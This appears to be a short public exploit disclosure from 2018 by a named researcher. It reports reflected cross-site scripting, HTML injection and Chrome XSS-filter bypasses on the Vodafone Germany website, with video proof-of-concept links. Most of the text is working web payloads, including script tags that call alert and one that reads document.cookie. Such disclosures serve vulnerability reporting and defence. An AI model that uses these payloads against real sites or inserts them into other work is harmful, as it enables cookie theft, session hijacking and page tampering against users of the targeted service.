The vodafone.de site suffers from multiple cross site scripting and HTML injection vulnerabilities.
3ecddb13fe9215d92c2b556df3820610# Exploit Title: [ XSS Reflected ( Cross Site Scripting ) at Vodafone DE ]
# Date: [02.01.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [www.vodafone.de]
# PoC
https://www.youtube.com/watch?v=YCjNEW6gNgg
# XSS Reflected Payload :
<svg/onload=alert('ismailtasdelen')>
# Exploit Title: [ HTML Injection at Vodafone DE ]
# PoC
https://www.youtube.com/watch?v=aF6X3n6l8AA
# HTML Injection Payload :
<IMG SRC="https://upload.wikimedia.org/wikipedia/en/9/95/Vodafone_logo_2017.png">
# Exploit Title: [ Chrome XSS ( Cross Site Scripting ) Bypass at Vodafone DE ]
# PoC
https://www.youtube.com/watch?v=D67H4k_tm7U
# Chrome XSS ( Cross Site Scripting ) Bypass Payload :
<IMG """><SCRIPT>alert("Ismail Tasdelen")</SCRIPT>">
<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>">
# Exploit Title: [ Chrome XSS ( Cross Site Scripting ) Bypass at Vodafone DE ]
# PoC
https://www.youtube.com/watch?v=ddxJUBBc2ZY
# Chrome XSS ( Cross Site Scripting ) Bypass Payload :
<script ~~~>alert(0%0)</script ~~~>
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen/